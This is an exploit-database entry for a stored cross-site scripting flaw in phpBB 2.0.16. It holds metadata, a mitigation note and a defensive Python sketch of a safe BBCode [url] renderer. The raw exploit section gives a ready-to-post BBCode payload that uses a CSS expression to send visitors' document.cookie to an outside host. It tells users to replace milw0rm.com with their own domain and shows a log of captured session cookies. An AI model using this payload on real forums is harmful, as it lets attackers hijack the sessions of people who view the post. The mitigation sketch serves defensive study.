Vendor: phpBB
By: D|ablo CCTEAM
CVSS: 7.5 (HIGH)
CWE: 79 (Cross-Site Scripting (XSS))
Product Name: phpBB
Affected Version From: 2.0.16
Affected Version To: 2.0.16
Patch Exists: YES
Related CWE: N/A
CPE: a:phpbb:phpbb:2.0.16
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2005

CCTEAM PhpBB 2.0.16 XSS EXPLOIT

This exploit allows an attacker to inject malicious JavaScript into a vulnerable web application; the code runs in the browser of any user who views the affected page. It targets phpBB 2.0.16, a popular open-source forum package. The malicious code is delivered as a specially crafted URL placed in a BBCode [url] tag inside a forum post.

Mitigation:

Input validation should be applied to user-supplied content so that malicious code cannot be injected into the application. The application should also be kept up to date with the latest security patches.
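As an added, defensive illustration of that mitigation (written for this page; it is neither phpBB's code nor part of the Exploit-DB entry), the following Python sketch of a BBCode [url] renderer checks the tag's target against an http(s) allow-list and HTML-escapes everything it emits. A target that carries quotes and a style attribute, the shape used by the payload below, is then displayed as inert text instead of becoming markup. The tag grammar, the allowed character set and the sample posts are assumptions chosen for the example.

```python
import html
import re
from typing import Optional

# Hypothetical hardened renderer for the BBCode [url] tag, written for
# this example; it is not phpBB's code. Two forms are accepted:
#   [url]http://host/path[/url]        -> link text is the URL itself
#   [url=http://host/path]label[/url]  -> link text is the label
# Neither the target nor the label may contain '[' or ']', so a second
# [url=...] nested inside the label cannot supply its own attributes.
URL_TAG = re.compile(
    r"\[url(?:=(?P<target>[^\[\]]*))?\](?P<text>[^\[\]]*)\[/url\]",
    re.IGNORECASE,
)

# Allow-list (an assumption for the example): absolute http(s) URLs made
# only of characters RFC 3986 permits. Whitespace, backticks, '<' and
# '>' are therefore rejected, and a "javascript:" scheme never matches.
SAFE_URL = re.compile(r"^https?://[A-Za-z0-9._~:/?#@!$&'()*+,;=%-]+$")


def safe_href(target: str) -> Optional[str]:
    """Return the target if it is an acceptable link, else None."""
    target = target.strip()
    return target if SAFE_URL.fullmatch(target) else None


def render_url_tag(match: re.Match) -> str:
    """Turn one matched [url] tag into HTML, or into inert escaped text."""
    target = match.group("target")
    label = match.group("text")
    href = safe_href(target if target is not None else label)
    if href is None:
        # Rejected target: show the raw BBCode, fully escaped, so that
        # quotes and 'style=' fragments stay text instead of attributes.
        return html.escape(match.group(0), quote=True)
    if not label:
        label = href
    return '<a href="%s">%s</a>' % (
        html.escape(href, quote=True),
        html.escape(label, quote=True),
    )


def render_post(bbcode: str) -> str:
    """Render a post: [url] tags become links, everything else is escaped."""
    out = []
    pos = 0
    for m in URL_TAG.finditer(bbcode):
        out.append(html.escape(bbcode[pos:m.start()], quote=True))
        out.append(render_url_tag(m))
        pos = m.end()
    out.append(html.escape(bbcode[pos:], quote=True))
    return "".join(out)


# Constructed sample posts (not taken from the page): one ordinary link and
# one that mirrors the shape of the payload below, a nested [url=...] whose
# target tries to close the href attribute and add a style= attribute.
BENIGN_POST = "[url=http://example.com/a?b=1&c=2]Example[/url]"
HOSTILE_POST = "[url]www.ut[url=www.s=''style='top:expression(x)']x[/url][/url]"

if __name__ == "__main__":
    print(render_post(BENIGN_POST))
    print(render_post(HOSTILE_POST))
```

The two ideas that matter are the order of operations (only the untrusted fragments that pass validation ever reach an attribute, and they are escaped on the way in) and the refusal to let a target or label contain brackets, which is what stops the nested-tag trick from assembling a second set of attributes.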

Exploit-DB raw data:

/*
1) Change milw0rm.com to your domain.com
2) Post the below code into a new message.

Example Output:
***.**.***.*** - - [09/Jul/2005:03:09:13 -0500] 
"GET /cgi-bin/shell.jpg?phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%223%22%3B%7D;%20phpbb2mysql_sid=898eeaa6ea3c9848a60121d3450a1287;%20phpbb2mysql_t=a%3A1%3A%7Bi%3A3%3Bi%3A1120845509%3B%7D HTTP/1.1" 404 305 "http://tester/phpBB2/viewtopic.php?t=3"

/str0ke
*/


******************************************************************************************************
*					CCTEAM PhpBB 2.0.16 XSS EXPLOIT                              *
*                                           Powered by D|ablo CCTEAM                                 *
******************************************************************************************************
[color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://www.milw0rm.com/cgi-bin/shell.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]

******************************************************************************************************
*				               http://ccteam.ru/                                     *
*                                             http://defacers.ru/                                    *
******************************************************************************************************

# milw0rm.com [2005-07-08]